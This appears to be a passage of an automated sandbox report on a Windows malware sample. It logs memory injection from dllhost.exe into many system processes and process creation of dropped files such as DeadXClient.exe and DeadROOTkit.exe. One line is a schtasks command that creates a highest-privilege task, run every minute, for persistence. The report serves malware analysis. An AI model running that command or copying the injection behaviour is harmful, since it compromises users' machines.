                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8660000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAE1050000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 37B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2D49ABF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C8D4DC0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15E7EC90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 15D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1370000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2E50000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13F0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2CF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 14C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2F40000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 11E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A10000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2580000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2DD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 8D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1190000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 22B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BF0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1100000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 980000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 900000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1140000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1020000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 590000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 770000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 25C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1260000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CE0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: E70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 610000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 840000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 910000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 7A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: A10000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D80000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 9C0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1000000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DD0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3040000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: BA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: CA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: B90000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1220000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: C20000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 760000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2D70000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 670000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 12A0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13E0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 13D0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: DA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 390000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 430000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2240000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 3120000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: FA0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 2A60000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 1470000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: D00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: 810000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\ICDLjdNbgWYRMIeTNoGhctwqTDuffaTkDMgnlDpiRoqVCPNnNnHJUlS\NMlgkDPXiTdX.exe base: F00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadXClient.exe base: 1C560000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209CDA00000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C9A4B0000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D056260000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC87A30000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 1120000
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 11C0000
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\1.exe "C:\Users\user\AppData\Local\Temp\1.exe"
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
                        Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe
                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
                        Source: dwm.exe, 00000017.00000000.2349182408.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000017.00000002.3527140898.000001D159439000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Program Manager
                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Code function: 2_2_00007FF6FAC09650 cpuid 2_2_00007FF6FAC09650
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\certifi VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\libcrypto-3.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\libffi-8.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\select.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pyd VolumeInformation
